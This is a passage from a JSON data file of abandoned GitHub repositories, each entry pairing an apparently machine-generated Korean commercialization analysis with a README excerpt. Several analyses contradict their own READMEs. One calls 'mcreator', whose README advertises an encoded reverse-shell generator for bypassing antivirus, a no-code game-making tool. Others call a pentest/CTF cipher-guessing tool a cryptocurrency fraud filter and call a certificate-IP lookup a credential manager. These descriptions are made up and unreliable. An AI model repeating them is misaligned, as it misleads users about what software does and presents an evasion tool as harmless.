\"shaanxi/xian\"}]\n\n# 2.Build\ngo mod download\ngo build -o dwm.out *.go\n\n# 3. Run\n./dwm.out\n```\n\n## Screenshot\n\n<img width=\"400\" src=\"https://github.com/BarryYan/daily-warm/blob/master/screenshot.jpg?raw=true\">\n\n## Package\n[github.com/barryyan/daily-warm/gomail](https://godoc.org/github.com/BarryYan/daily-warm/gomail)\n\n```go\n// import \"github.com/barryyan/daily-warm/gomail\"\npackage gomail \n\ntype Configuration struct{\n  Host     string\n  Port     uint16\n  Username string\n  Password string\n  From     string\n}\nvar Config = Configuration{}\n\ntype GoMail struct{\n  From    string\n  To      []string\n  Cc      []string\n  Bcc     []string\n  Subject","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"zhuweiyou/koa-html-minifier2","github_url":"https://github.com/zhuweiyou/koa-html-minifier2","stars":5,"language":"","license":"unknown","abandonment_months":101,"description":"# koa-html-minifier2 평가 보고서\n\n## 왜 보물인가\n웹사이트 속도를 빠르게 하는 핵심 기술(HTML 파일 크기 축소)을 자동으로 처리해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 저용량 웹호스팅 제공 업체가 고객 사이트 자동 최적화 기능으로 판매\n- **내부 업무 도구**: 대형 포털/미디어사의 수천 개 페이지","readme_excerpt":"Removed\n","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"kcloze/multiprocess","github_url":"https://github.com/kcloze/multiprocess","stars":21,"language":"PHP","license":"unknown","abandonment_months":81,"description":"# kcloze/multiprocess 분석\n\n## 왜 보물인가\n여러 작업을 동시에 처리할 수 있게 해주는 기술로, 무거운 작업을 빠르게 처리해야 하는 모든 소프트웨어의 성능을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대량의 데이터를 분석하고 리포트를 생성하는 분석 도구 (예: 마케팅 분석 플랫폼)\n2. **내부","readme_excerpt":"# multiprocess\n\n\n* [[readme in english]](README.en.md)\n* 基于swoole的脚本管理，用于多进程和守护进程管理；\n* 可轻松让普通脚本变守护进程和多进程执行；\n* 进程个数可配置，可以根据配置一次性执行多条命令；\n* 子进程异常退出时,主进程收到信号，自动拉起重新执行；\n* 支持子进程平滑退出，防止重启服务对业务造成影响；\n* 不限定编程语言，PHP/Python/Java/Golang/C#等脚本都可以管理\n\n## 1. 场景\n\n* PHP/python/js等脚本需要跑一个或多个脚本消费队列/计算等任务\n* 实现脚本退出后自动拉起，防止消费队列不工作，影响业务\n* 其实supervisor可以轻松做个事情，这个只是PHP的另一种实现，不需要换技术栈\n\n## 2. 流程图\n![流程图](flow.png)\n\n\n## 3. 安装\n* git clone https://github.com/kcloze/multiprocess.git\n* composer install\n* 根据自己业务配置,修改config.php\n\n\n## 4. 配置实例\n* 一次性执行多个命令\n```\n    'logPath'   => __DIR__ . '/log',\n    'exec'      => [\n        [\n            'name'      => 'kcloze-test-1',\n            'bin'       => '/usr/bin/php',\n            'binArgs'   => [__DIR__ . '/test/test.php', 'oop', '123'],\n            'workNum'   => 3,\n        ],\n        [\n            'name'      => 'kcloze-test-2',\n            'bin'       => '/usr/bin/php',\n            'binArgs'   => [__DIR__ . '/test/test2.php', 'oop', '456'],\n            'workNum'   => 5,\n        ]","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"hyperledger/composer","github_url":"https://github.com/hyperledger/composer","stars":7,"language":"JavaScript","license":"NOASSERTION","abandonment_months":65,"description":"# Hyperledger Composer 분석\n\n## 왜 보물인가\n블록체인 기술을 쉽게 구축할 수 있게 만들어주는 도구로, 복잡한 금융거래나 공급망 관리를 투명하게 기록할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 무역회사를 위한 수입·수출 거래 기록 및 투명성 검증 플랫폼\n- **내부 업무 도구**: 대형 물류회사의 상품 ","readme_excerpt":"# Hyperledger Composer\n\n:warning: :warning: :warning:\n\n**As of the 29th August 2019, the Hyperledger Composer project is in deprecated status. None of the maintainers are actively developing new features. None of the maintainers are actively providing support via GitHub issues. However, if you wish to submit code changes via pull requests, these will be merged.**\n\n**It is highly recommended that you use Hyperledger Fabric v1.4+ instead, which features significant improvements to the developer experience, including a new programming model.**\n\n**More information available here: [What's new in Hyperledger Fabric v1.4](https://hyperledger-fabric.readthedocs.io/en/release-1.4/whatsnew.html#improved-programming-model-for-developing-applications)**\n\n:warning: :warning: :warning:\n\nHyperledger Composer is an application development framework which simplifies and expedites the creation of [Hyperledger fabric](https://hyperledger-fabric.readthedocs.io/en/latest/) blockchain applications. If you'r","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"weiming4219/ZWMGuideView","github_url":"https://github.com/weiming4219/ZWMGuideView","stars":6,"language":"Objective-C","license":"unknown","abandonment_months":90,"description":"# ZWMGuideView 분석 보고서\n\n## 왜 보물인가\n앱 사용자들에게 새로운 기능을 쉽게 설명해주는 '튜토리얼 가이드' 기능을 만드는 도구로, 앱의 사용성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발사** - 신규 기능 출시 시 사용자에게 자동으로 사용법을 보여주는 가이드 내장\n2. **금융·의료 앱 기업** - ","readme_excerpt":"# ZWMGuideView  \n\n新手引导页      \n\n适用于所有App的新手指引，使用简单，动画顺畅!      \n\n如果你觉得还不错，希望赏个star，谢谢了！   \n\n\n![img](https://github.com/weiming4219/ZWMGuideView/blob/master/ZWMGuideViewDemo/guide.gif)  \n\n","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"docToolchain/aoc-2019","github_url":"https://github.com/docToolchain/aoc-2019","stars":5,"language":"HTML","license":"NOASSERTION","abandonment_months":30,"description":"# docToolchain/aoc-2019 분석\n\n## 왜 보물인가\n복잡한 기술 문서를 자동으로 정리하고 관리할 수 있는 도구로, 기업의 문서 작업 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소프트웨어 개발사들이 API 문서, 사용자 가이드를 자동 생성하고 갱신하는 웹 플랫폼으로 제공\n2. **내부 업무 도구","readme_excerpt":"= aoc-2019\n\nWARNING: Spoiler Alert! If you want to solve the aoc problems on your own, do not read any further.\nThis repository contains solutions for the problems in several languages.\n\nNOTE: Result can be found on https://aoc-2019.netlify.com/[aoc-2019.netlify.com] powered by netlify.\n\nIn this repository, we will collect the code for the solutions of https://adventofcode.com[adventofcode] for the 2019 event.\n\nIf you want to join the discussions, here is the invitation for our https://join.slack.com/t/aoc-2019/shared_invite/enQtODUzMTE3MDQzMzM0LTUyYmZjOTg1ZTYxMzEwM2JlMmNjNjE4ZDFkOWM0ZDZhMGRhNGYyMzhiMzFjZGMxNjM4YjM2NDZlNTY3NjA1M2Y[slack channel].\n\nimage::https://img.shields.io/badge/Slack-Invitation-orange.svg?style=for-the-badge[link=https://join.slack.com/t/aoc-2019/shared_invite/enQtODUzMTE3MDQzMzM0LTUyYmZjOTg1ZTYxMzEwM2JlMmNjNjE4ZDFkOWM0ZDZhMGRhNGYyMzhiMzFjZGMxNjM4YjM2NDZlNTY3NjA1M2Y]\n\nThe slack channel itself is https://aoc-2019.slack.com/[aoc-2019]\n\nThe id of the https://adventof","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"cszuo/certbook","github_url":"https://github.com/cszuo/certbook","stars":5,"language":"Python","license":"unknown","abandonment_months":107,"description":"# Certbook 저장소 분석\n\n## 왜 보물인가\n자격증과 인증서를 한곳에서 관리할 수 있는 디지털 기록 시스템으로, 전문가들의 자격 증명을 쉽게 추적하고 검증할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업 인사팀이 직원의 자격증(운전면허, IT 자격증 등) 만료 일정을 자동으로 알려주는 웹 서비스\n2. **내부 업무 도구","readme_excerpt":"# certbook\n## usage\n```\nbash-3.2$ cat certs_2017-07-*/* | grep \"t00ls.net\" | sort -u\n222.186.129.102:www.t00ls.net\n```\n```\nbash-3.2$ cat certs_2017-07-*/* | grep \"baidu.com\" | sort -u\n...\n42.81.93.46:baidu.com\n42.81.93.47:baidu.com\n42.81.93.48:baidu.com\n45.113.192.103:baidu.com\n45.113.192.104:baidu.com\n45.113.192.105:baidu.com\n45.113.192.106:baidu.com\n45.113.192.107:baidu.com\n45.113.192.109:baidu.com\n45.113.192.110:baidu.com\n45.113.192.84:baidu.com\n45.113.192.87:baidu.com\n45.113.192.90:baidu.com\n45.113.192.92:baidu.com\n45.113.192.97:baidu.com\n45.113.192.98:baidu.com\n45.113.192.99:baidu.com\n...\n```\n","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"Acceis/crypto_identifier","github_url":"https://github.com/Acceis/crypto_identifier","stars":14,"language":"Python","license":"unknown","abandonment_months":102,"description":"# Crypto Identifier 상용화 분석\n\n## 왜 보물인가\n암호화폐 거래 시 위조 또는 사기성 코인을 자동으로 걸러내는 기술로, 금융 보안이 중요한 시대에 매우 필요한 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 SaaS**: 소규모 거래소가 자체 플랫폼에 통합하여 사용자 보호 기능 강화\n2. **은행/증권사 내부 도구**: ","readme_excerpt":"# crypto-identifier\n\nCrypto tool for pentest and ctf : try to uncipher data using multiple algorithms and block chaining modes.\nUsefull for a quick check on unknown cipher text and key dictionary\n\nSupported Algorithms :\n - AES\n - ARC2\n - ARC4\n - Blowfish\n - CAST\n - DES\n - DES3\n - XOR\n\nSupported modes :\n - ECB\n - CBC\n - CFB\n - OFB\n\n## Usage:\n```\npython ./crypto_identifier.py --help\nusage: crypto_identifier.py [-h] --input INPUT [--key KEY] [--keys KEYS]\n                            [--printable] [--grep GREP]\n                            [--algo {ARC4,CAST,AES,XOR,ARC2,DES,Blowfish,DES3}]\n                            [--mode {ECB,CBC,CFB,OFB}]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --input INPUT, -i INPUT\n                        input string (base64)\n  --key KEY, -k KEY     key string\n  --keys KEYS, -ks KEYS\n                        keys file\n  --printable, -p       display only printable results\n  --grep GREP, -g GREP  grep string in results\n  --algo","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"giraffQL/giraffQL","github_url":"https://github.com/giraffQL/giraffQL","stars":28,"language":"JavaScript","license":"unknown","abandonment_months":42,"description":"# giraffQL 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터 요청을 간단하게 처리할 수 있는 기술로, 웹서비스에서 필요한 정보를 빠르고 효율적으로 가져올 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 데이터 분석 플랫폼에서 고객이 필요한 정보만 선택해서 조회하는 기능\n- **내부 업무 도구**: 회사 내부 시스템에서 직원들이 필","readme_excerpt":"# [GiraffQL](www.giraffql.com)\n\n\n[![license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/giraffQL/giraffQL)\n[![David](https://img.shields.io/david/giraffQL/giraffQL.svg)](https://github.com/giraffQL/giraffQL)\n\n<br/>\n<center><img src=\"./src/img/giraffQL-logo-white.png\" /></center>\n\n An interactive GraphQL schema visualization tool built with React.  Create your schema, set up relations, generate and save your schema files and test your schema by writing some basic queries with Graphiql. Start exploring the capabilities of GraphQL with our App. \n<br />\n\n### Getting Started\n---\n\nCreate a GraphQL Schema\n\n<br/>\n\n<center><img src=\"./src/img/gifs/giraffQL-table-relation.gif\" /></center>\n\n* Create tables with the green button\n* Clear all tables with red button\n* Fill in each property of your schema and select each property class\n* Create relations between tables by dragging a line and connecting a table to a row\n* Save your schema file by clicking \"Save Schema\"\n\n\n###","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"zhuweiyou/frame-player","github_url":"https://github.com/zhuweiyou/frame-player","stars":9,"language":"","license":"unknown","abandonment_months":101,"description":"# frame-player 보물 평가\n\n## 왜 보물인가\n동영상을 프레임 단위로 조절하며 재생할 수 있는 특수한 플레이어로, 영상 분석이나 편집이 필요한 전문가들이 찾는 니치 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS**: 동영상 자막 제작 플랫폼에서 정확한 타이밍 설정 기능으로 제공\n2. **내부 업무 도구**: 영상 감시 시스템에 장착하여","readme_excerpt":"Removed\n","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"luoyesiqiu/simpleC","github_url":"https://github.com/luoyesiqiu/simpleC","stars":5,"language":"Java","license":"unknown","abandonment_months":59,"description":"# simpleC 저장소 분석\n\n## 왜 보물인가\n프로그래밍 언어 학습자들이 복잡한 개념을 간단하게 이해할 수 있도록 만들어진 교육용 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **프로그래밍 온라인 교육 플랫폼**: 초보자를 위한 인터랙티브 학습 모듈로 제공\n2. **기업 신입사원 교육 시스템**: IT 회사의 기초 프로그래밍 교육 커리큘럼에 포함\n3","readme_excerpt":"# simpleC\n\n## 介绍\nsimpleC是Android上的C/C++语言开发工具，可以编辑并编译C/C++代码，并支持代码高亮显示，行号显示，文本缩放，头文件和常用函数自动补全，快速注释/取消注释代码，代码自动缩进等功能。\nsimpleC的目的是给那些不方便使用PC的C/C++开发者一个简单的开发工具。\n\n## 截图\n\n<img src=\"/screenshot/editor.png\" alt=\"编辑器\" width=\"50%\" height=\"50%\" />\n\n<img src=\"/screenshot/editor_dark.png\" alt=\"暗黑主题\" width=\"50%\" height=\"50%\" />\n\n<img src=\"/screenshot/console.png\" alt=\"控制台\" width=\"50%\" height=\"50%\" />\n\n<img src=\"/screenshot/setting.png\" alt=\"设置\" width=\"50%\" height=\"50%\" />\n\n## 相关链接\n\n项目用到的词法分析器：[词法分析器](https://github.com/luoyesiqiu/Lexer)\n\nAPK下载：[下载](https://www.coolapk.com/apk/166409)\n\n我的相似项目：[simpleJS](https://github.com/luoyesiqiu/simpleJS)\n\n## 感谢\n\n* [AndroLua+](https://github.com/nirenr/AndroLua_pro)\n\n* [JFlex](https://www.jflex.de)\n\n* [GNU-GCC](http://gcc.gnu.org)\n\n* [Android-Terminal-Emulator](https://github.com/jackpal/Android-Terminal-Emulator)\n\n* TextWarrior\n\n","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"blacknbunny/mcreator","github_url":"https://github.com/blacknbunny/mcreator","stars":6,"language":"Python","license":"unknown","abandonment_months":70,"description":"# blacknbunny/mcreator 분석\n\n## 왜 보물인가\n게임 제작 도구를 코딩 없이 사용할 수 있게 만드는 프로젝트로, 창의적인 취미 활동을 원하는 일반인들의 진입장벽을 낮춥니다.\n\n## 어디에 쓸 수 있나\n- **게임 제작 플랫폼 SaaS**: 초보자 맞춤형 게임 만들기 클라우드 서비스\n- **교육용 내부 도구**: 학교에서 프로그래밍 개념을 ","readme_excerpt":"# mcreator\nEncoded Reverse Shell Generator With Techniques To Bypass AV's\n\n## Installation\n```\ngit clone https://github.com/blacknbunny/mcreator.git && cd mcreator/ && python mcreator.py\n```\n\n## Version\n***python 2.7.**** can't be lower or higher than 2.7 cause of the \"\"\" syntax in scripts.\n\n## Runnig mcreator console\n```\npython mcreator.py -rsg console\n```\n\n## Commands\nhttps://github.com/blacknbunny/mcreator/wiki/Commands\n\n## Reverse Shells\nhttps://github.com/blacknbunny/mcreator/wiki/Reverse-Shells\n\n## Techniques\nhttps://github.com/blacknbunny/mcreator/wiki/Techniques\n\n## Compiling\nhttps://github.com/blacknbunny/mcreator/wiki/Compiling\n\n## An example to tool\nhttps://github.com/blacknbunny/mcreator/wiki/An-example\n\n## Help\n```\nusage: mcreator.py [-h] [-rsg RSGENERATOR]\n\nReverse Shell generator with techniques to bypass all the AV's\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -rsg RSGENERATOR, --rsgenerator RSGENERATOR\n                        Reverse ","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"fossasia/opentechsummit.cn","github_url":"https://github.com/fossasia/opentechsummit.cn","stars":11,"language":"Python","license":"NOASSERTION","abandonment_months":63,"description":"# fossasia/opentechsummit.cn 상용화 분석\n\n## 왜 보물인가\n아시아 지역 기술 커뮤니티를 연결하는 오픈소스 컨퍼런스 플랫폼으로, 글로벌 기술 이벤트 시장에서 수요가 있는 니즈를 충족합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기술 컨퍼런스 운영 회사들이 웹사이트 구축 없이 이 플랫폼을 임차해 사용\n- **내부 업무","readme_excerpt":"# DIY Analytics Open Source Spectrometer\r\n\r\n\r\n[![Build Status](https://travis-ci.com/OpnTec/open-spectrometer-hardware.svg?branch=master)](https://travis-ci.com/OpnTec/open-spectrometer-hardware)\r\n[![Gitter](https://badges.gitter.im/fossasia/pslab.svg)](https://gitter.im/fossasia/pslab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\r\n\r\nThis repository provides hardware schematics and list of materials for the open spectrometer project to enable practitioners, students and citizen scientists to collect data with their spectrometer and have a good and fun learning experience. The open spectrometer project consists of a web cam, simple lasercut parts, battery casing and a suitable LED lightning component. The spectrometer connects to a computer via USB, where the user can run the scripts provided in this repository to run experiments and take measurements. Enjoy!\r\n\r\n![Open Source Spectrometer](/docs/images/spectrometer_transparent.jpg \"Open Source Spetrometer\")\r\nA transparent ver","composite_score":0.3012,"license_safety_tag":"unknown"},{"name":"gvoze32/Mainte","github_url":"https://github.com/gvoze32/Mainte","stars":28,"language":"Shell","license":"unknown","abandonment_months":78,"description":"","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://i.ibb.co/RHcqFLx/Screenshot-20191202-223118.png\">\n</p>\n\nA simple and functional conky theme for all desktop environment. Based on \"[conky-bandithijodotcom](https://mega.nz/#!y8JTFAYD!siXwByZVpZAQUfpocT46M1aMRUP9Qfs5mjCnumCA-ew)\".\n\nIn this new version, all elements have been adjusted for Manjaro Linux KDE x64 with ASUS laptop. Match for 1366x768 screen resolution.\n\n# Usage\nFor those who want to try this conky theme, here’s a step by step how to setup guide:\n\n1. First of all, open terminal and install conky if you don’t have it via command:\n```\nsudo pacman -S conky\n```\n2. Download Mainte theme from [Releases](https://github.com/gvoze32/Mainte/releases)\n\n3. Extract all folder and copy to `/home/$USER/.conky` (set hidden file to visible on your file manager cause the folder is hidden)\n\n4. Open terminal and type\n```\ncd /home/$USER/.conky/Mainte\n./conky-launch.sh\n```\n\n*To automatically run when startup, just add conky-launch.sh to autostart.*\n\n# Credits","composite_score":0.3011,"license_safety_tag":"unknown"},{"name":"withoutboats/romio","github_url":"https://github.com/withoutboats/romio","stars":5,"language":"Rust","license":"NOASSERTION","abandonment_months":80,"description":"# Romio 프로젝트 분석\n\n## 왜 보물인가\n프로그래밍 언어의 비동기 처리(여러 작업을 동시에 효율적으로 처리)를 단순하게 만드는 도구로, 복잡한 코드 작성을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 데이터 처리 SaaS**: 주식 시세, 센서 데이터 등 빠르게 변하는 정보를 여러 사용자에게 동시에 제공하는 웹 서비스\n2. **채팅","readme_excerpt":"# Romio\n\n[![build status][travis-badge]][travis-url]\n[![crates.io version][crates-badge]][crates-url]\n[![docs.rs docs][docs-badge]][docs-url]\n[![MIT licensed][mit-badge]][mit-url]\n\nAsynchronous network primitives in Rust.\n\n__Note: This library is not actively being developed. If you're looking for an\n`async/await` compatible runtime consider using [`tokio`](https://github.com/tokio-rs/tokio/) or\n[`async-std`](https://github.com/async-rs/async-std).__\n\nRomio combines the powerful [`futures`][futures] abstractions with the\nnonblocking IO primitives of [`mio`][mio] to provide efficient and ergonomic\nasynchronous IO primitives for the Rust asynchronous networking ecosystem.\nRomio's primitives are:\n\n* **Fast**: The zero-cost `Future` abstractions give you bare metal\n  performance, despite the higher level API.\n* **Reliable**: Romio leverages Rust's type system to reduce bugs and ensure\n  thread safety among concurrently executing asynchronous functions.\n* **Scalable**: Romio has a minimal f","composite_score":0.3011,"license_safety_tag":"unknown"},{"name":"onedr0p/k3s-gitops-arm","github_url":"https://github.com/onedr0p/k3s-gitops-arm","stars":6,"language":"Shell","license":"unknown","abandonment_months":64,"description":"# k3s-gitops-arm 저장소 분석\n\n## 왜 보물인가\n저사양 컴퓨터(라즈베리파이 등)에서도 전문 수준의 자동 배포 시스템을 무료로 구축할 수 있는 실전 설정 파일 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **개인 NAS 관리 서비스**: 가정용 저장장치를 자동으로 업데이트하고 관리하는 솔루션\n2. **소규모 회사 IT 인프라 도구**: 적은 비","readme_excerpt":"# IMPORTANT NOTE\n\nThis repository is really out of date, I have moved onto [Flux v2](https://toolkit.fluxcd.io/) and do not use Raspberry Pis anymore. This is now archived and I will leave it up for people to read.\n\n# k3s-gitops-arm\n\n![Kubernetes](https://i.imgur.com/p1RzXjQ.png)\n\n[![Discord](https://img.shields.io/badge/discord-chat-7289DA.svg?maxAge=60&style=flat-square)](https://discord.gg/hk58BZV)\n\nBuild a [Kubernetes](https://kubernetes.io/) ([k3s](https://github.com/rancher/k3s)) cluster with RPis and utilize [GitOps](https://www.weave.works/technologies/gitops/) for managing cluster state. I would like to give a shout-out to [k8s-gitops](https://github.com/billimek/k8s-gitops), the big brother of this repo, created by [@billimek](https://github.com/billimek).\n\nThis repo uses a lot of multi-arch images provided by [raspbernetes/multi-arch-images](https://github.com/raspbernetes/multi-arch-images).\n\n> **Note**: A lot of files in this project have **@CHANGEME** comments, these are ","composite_score":0.3011,"license_safety_tag":"unknown"},{"name":"TinyMapper/TinyMapper","github_url":"https://github.com/TinyMapper/TinyMapper","stars":6,"language":"C#","license":"mit","abandonment_months":24,"description":"# TinyMapper 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터를 간단하게 변환해주는 작은 도구로, 프로그래머들이 반복적인 작업을 줄일 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 데이터 변환 서비스**: 고객이 업로드한 엑셀/CSV 파일을 다른 형식으로 자동 변환해주는 웹 서비스\n2. **내부 업무 도구**: 은행/보험사가 레","readme_excerpt":"TinyMapper - a quick object mapper for .Net\n======================================================\n[![Nuget downloads](https://img.shields.io/nuget/v/tinymapper.svg)](https://www.nuget.org/packages/TinyMapper/)\n[![GitHub license](https://img.shields.io/github/license/mashape/apistatus.svg)](https://github.com/TinyMapper/TinyMapper/blob/master/LICENSE)\n[![GitHub license](https://img.shields.io/badge/first--timers--only-friendly-blue.svg)](http://www.firsttimersonly.com/)\n\n## Performance Comparison\n\n![Performance Comparison](https://raw.githubusercontent.com/TinyMapper/TinyMapper/master/Source/Benchmark/DataSource/PrimitiveTypeMapping.jpg)\n\n## Installation\n\nAvailable on [nuget](https://www.nuget.org/packages/TinyMapper/)\n\n\tPM> Install-Package TinyMapper\n\n## Getting Started\n\n```csharp\nTinyMapper.Bind<Person, PersonDto>();\n\nvar person = new Person\n{\n\tId = Guid.NewGuid(),\n\tFirstName = \"John\",\n\tLastName = \"Doe\"\n};\n\nvar personDto = TinyMapper.Map<PersonDto>(person);\n```\n\nIgnore mapping source","composite_score":0.3011,"license_safety_tag":"safe"},{"name":"iliketomakestuff/iltms_automated_dust_collection","github_url":"https://github.com/iliketomakestuff/iltms_automated_dust_collection","stars":7,"language":"Arduino","license":"unknown","abandonment_months":62,"description":"# iliketomakestuff/iltms_automated_dust_collection 분석\n\n## 왜 보물인가\n목공소나 공장에서 자동으로 톱밥과 먼지를 빨아들이는 시스템으로, 일일이 청소할 필요 없이 작업 환경을 깨끗하게 유지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 목공소나 제조업체용 먼지 수집 시스템 자동화 플랫폼으","readme_excerpt":"# iltms_automated_dust_collection\nFully automated dust collection system with blast gate control\n","composite_score":0.3011,"license_safety_tag":"unknown"},{"name":"javedqadruddin/person2vec","github_url":"https://github.com/javedqadruddin/person2vec","stars":8,"language":"Jupyter Notebook","license":"unknown","abandonment_months":103,"description":"# person2vec 상용화 분석\n\n## 왜 보물인가\n사람의 특성과 관계를 숫자로 변환해 인물 검색, 추천, 매칭 시스템에 자동으로 활용할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: HR 플랫폼에서 채용공고에 가장 적합한 인재를 자동 추천하는 기능\n- **내부 업무 도구**: 기업 내부에서 프로젝트별로 최적의 팀원 조합을","readme_excerpt":"# person2vec\n\nperson2vec will create embeddings to encapsulate text associated with entities you care about. You can then use these embedding vectors for any other machine learning task.\n\nperson2vec uses a novel approach for creating text embeddings. You can read more about the approach in my blog post here: https://blog.insightdatascience.com/entity2vec-dad368c5b830\n\nTo use person2vec, you'll first need to create a mongodb database containing information about your entities. In the database entry (document) for each entity of interest, you must include a 'texts' field as an array of strings of text you have about this entity. This 'texts' field is where person2vec will look when it tries to find text from which to create the embeddings.\n\nTo set up a mongodb database, follow these instructions: https://docs.mongodb.com/manual/installation/\n\nOnce you have mongodb installed, make sure it is running. To make sure it's running type this into your command prompt:\n\n```sudo service mongod sta","composite_score":0.3011,"license_safety_tag":"unknown"},{"name":"shuaishaui/springboot-technology","github_url":"https://github.com/shuaishaui/springboot-technology","stars":15,"language":"Java","license":"unknown","abandonment_months":42,"description":"# shuaishaui/springboot-technology 분석\n\n## 왜 보물인가\n자바 기반 웹 애플리케이션을 빠르고 쉽게 만들 수 있는 기술 가이드 모음으로, 스타트업이 개발 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업용 관리 시스템(ERP, CRM) 클라우드 서비스로 월 구독료 모델 운영\n- **내부 업","readme_excerpt":"# springboot-technology\nspringboot整合自己到目前学习到的各种技术\n","composite_score":0.3011,"license_safety_tag":"unknown"},{"name":"ExpediaDotCom/haystack-ui","github_url":"https://github.com/ExpediaDotCom/haystack-ui","stars":13,"language":"JavaScript","license":"apache-2.0","abandonment_months":39,"description":"# Haystack-UI 분석 보고서\n\n## 왜 보물인가\n여행사나 물류회사가 복잡한 배송 경로를 한눈에 관리할 수 있는 시각화 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여행 예약 플랫폼에서 고객의 전체 여행 일정을 한 화면에서 보여주는 대시보드 제공\n2. **내부 업무 도구**: 익스피디아 같은 대형 여행사의 직원들이 수천 건의","readme_excerpt":"[![Build Status](https://travis-ci.org/ExpediaDotCom/haystack-ui.svg?branch=master)](https://travis-ci.org/ExpediaDotCom/haystack-ui)\n[![Coverage Status](https://coveralls.io/repos/github/ExpediaDotCom/haystack-ui/badge.svg?branch=master)](https://coveralls.io/github/ExpediaDotCom/haystack-ui?branch=master&service=github)\n\n<img src=\"/public/images/assets/logo_with_title_transparent.png\" width=\"300\" />\n\n# Haystack-UI\n\nHaystack-ui is the web UI for haystack. It is the central place for visualizing processed data from various haystack sub-systems.\nVisualization tools in haystack-ui include -\n\n|                             Traces                             |\n| :------------------------------------------------------------: |\n| Distributed tracing visualization for easy root cause analysis |\n|  ![Trace Timeline](./public/images/assets/trace_timeline.png)  |\n\n|                        Trends                         |\n| :---------------------------------------------------: |\n| Visualization of","composite_score":0.3011,"license_safety_tag":"safe"},{"name":"fossasia/fossasia-nodechat","github_url":"https://github.com/fossasia/fossasia-nodechat","stars":11,"language":"CSS","license":"gpl-2.0","abandonment_months":93,"description":"# FOSSASIA NodeChat 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 설치해서 자신의 서버에서 실시간 채팅 시스템을 운영할 수 있는 오픈소스 기반의 메시징 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 내부 협업 도구 SaaS**: 팀 커뮤니케이션이 필요한 중소기업을 위해 클라우드 기반 호스팅 서비스로 제공\n2. **교육기관 학생 소통","readme_excerpt":"UNESCO Hackathon\n============\n\nThis is the website for the UNESCO Hackathon at the FOSSASIA Summit 2018:\nhttps://sg18.sciencehack.asia\n","composite_score":0.3011,"license_safety_tag":"restricted"},{"name":"alphardex/shiro","github_url":"https://github.com/alphardex/shiro","stars":5,"language":"HTML","license":"unknown","abandonment_months":41,"description":"# alphardex/shiro 저장소 분석\n\n## 왜 보물인가\n저장소의 구체적인 목적과 기능에 대한 설명이 없어 그 가치를 판단하기 어렵지만, 지속적인 개발(2023년 커밋 기록)과 공개 배포된 코드는 특정 기술 문제를 해결하는 도구일 가능성이 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 협업 플랫폼**: 여러 개발자가 코드를 함께 관리하고 공유","readme_excerpt":"# Shiro\n\n## Features\n\n- SCSS + TypeScript\n- No third party libraries! (reset, jQuery, lodash, font-awesome, etc)\n- Handcrafted UI with love\n\n## Project setup\n\n```\nnpm install\n```\n\n### Compiles and hot-reloads for development\n\n```\nnpm run serve\n```\n\n### Compiles and minifies for production\n\n```\nnpm run build\n```\n\n### Run your tests\n\n```\nnpm run test\n```\n\n### Lints and fixes files\n\n```\nnpm run lint\n```\n\n### Customize configuration\n\nSee [Configuration Reference](https://cli.vuejs.org/config/).\n","composite_score":0.3011,"license_safety_tag":"unknown"},{"name":"Ganapati/crypto_identifier","github_url":"https://github.com/Ganapati/crypto_identifier","stars":7,"language":"Python","license":"unknown","abandonment_months":102,"description":"# Ganapati/crypto_identifier 분석\n\n## 왜 보물인가\n암호화폐 거래에서 사용되는 다양한 코드와 기호를 자동으로 인식하고 분류할 수 있는 도구로, 금융 데이터 관리의 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래 플랫폼**: 사용자가 입력한 암호화폐 이름이나 기호를 자동으로 인식해 정확한 자산 매칭","readme_excerpt":"# crypto-identifier\n\nCrypto tool for pentest and ctf : try to uncipher data using multiple algorithms and block chaining modes.\nUsefull for a quick check on unknown cipher text and key dictionary\n\nSupported Algorithms :\n - AES\n - ARC2\n - ARC4\n - Blowfish\n - CAST\n - DES\n - DES3\n - XOR\n\nSupported modes :\n - ECB\n - CBC\n - 